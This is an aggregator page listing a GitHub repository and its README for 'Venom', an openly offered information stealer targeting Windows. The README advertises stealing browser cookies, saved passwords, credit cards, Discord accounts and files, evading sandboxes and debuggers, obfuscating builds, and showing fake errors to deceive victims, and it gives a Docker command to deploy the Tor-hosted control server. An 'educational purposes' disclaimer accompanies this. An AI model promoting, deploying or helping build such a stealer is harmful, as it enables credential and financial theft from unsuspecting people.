Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ngn13/venom
Free and open source information stealer written in Go
https://github.com/ngn13/venom
golang-malware info-stealer information-stealer malware malware-development stealer
Last synced: about 4 hours ago
JSON representation
Free and open source information stealer written in Go
- Host: GitHub
- URL: https://github.com/ngn13/venom
- Owner: ngn13
- License: gpl-3.0
- Created: 2024-03-16T20:06:50.000Z (8 months ago)
- Default Branch: main
- Last Pushed: 2024-11-07T21:13:23.000Z (13 days ago)
- Last Synced: 2024-11-07T22:19:48.056Z (12 days ago)
- Topics: golang-malware, info-stealer, information-stealer, malware, malware-development, stealer
- Language: Go
- Homepage:
- Size: 1.58 MB
- Stars: 13
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE.txt
Awesome Lists containing this project
README
# Venom | Free and open source info-stealer
Venom is a free (as in freedom) and open source information stealer
tool targeting x64 Windows 10/11 systems, written in Go.> [!CAUTION]
> This software is designed and shared only for educational and
> research purposes. It's is provided without warranty and the
> distribution platform or the developers of the software are not
> responsible for any material, moral or legal damage that may occur
> due to incorrect or unethical use of the software.---
## 📸 Screenshots
| **Page:** home | **Page:** data | **Page:** build |
| ----------------------------------------------- | ------------------------------------------- | -------------------------------------------- |
| ![](assets/home.png) ![](assets/connection.png) | ![](assets/data.png) ![](assets/cookie.png) | ![](assets/build.png) ![](assets/builds.png) |## 🗃️ Features
- Easy setup with Docker
- Web interface over TOR
- Compile time obfuscated builds for unique signatures
- Anti-VM (Anti-Sandbox) and Anti-Debug features for protection
- Steal browser information (cookies, history data, passwords and credit cards) from popular Chromium-based browsers
- Steal discord account information from popular Chromium-based browsers and the Discord app
- Steal files from the disk
- Display fake error message to trick the user
- Fairly small build sizes (~4MB)
- Multi-language support (🇬🇧 English and 🇹🇷 Turkish)## 🚀 Setup
For a minimal setup, the server requirements are:
- Static IP
- At least 512MB memory
- At least a 1 core CPU
- Docker, you can install it with your distro's package managerThe docker image is a quite big one (~1GB) so this command may take a while:
```bash
docker run -d -p 80:8082 \
-e VENOM_ALLINT=true \
-e VENOM_URL=http:// \
-v $PWD/db:/venom/server/db \
-v $PWD/tor:/var/lib/tor/venom \
ghcr.io/ngn13/venom:latest
```
Then checkout the logs for the server (`docker logs `) to learn the onion
address, so you can access the interface over TOR. Please check out the [docs](docs/advanced.md)
for a more advanced setup.If you are having any problems then [create an issue](https://github.com/ngn13/ezcat/issues/new).
## ❤️ Contribute
If like this project, then please consider contributing! You can do so by
adding new features, fixing bugs, [adding translations](docs/translate.md) or by
just leaving a star!